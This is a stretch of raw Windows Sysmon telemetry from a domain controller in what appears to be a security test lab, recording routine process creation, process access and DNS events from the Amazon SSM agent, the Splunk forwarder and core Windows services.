13:34:19.763{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.681{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.681{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5B00-00000000A301}3936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E56-6005-2D00-00000000A301}22203296C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5d95e 154100x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.239{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe-----"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=9827A4A56980129F90A7A8FCA6065B29,SHA256=3AF8AEFAFDACA2124F5FA4B747753A17F62C7B442BB9F7917C832AB4AA7A0237,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 22542200x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.675{59A5CD1D-8E56-6005-2E00-00000000A301}24641.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.606{59A5CD1D-8E56-6005-2E00-00000000A301}246414.1.0.10.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E5B-6005-5900-00000000A301}38403836C:\Windows\system32\cmd.exe{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 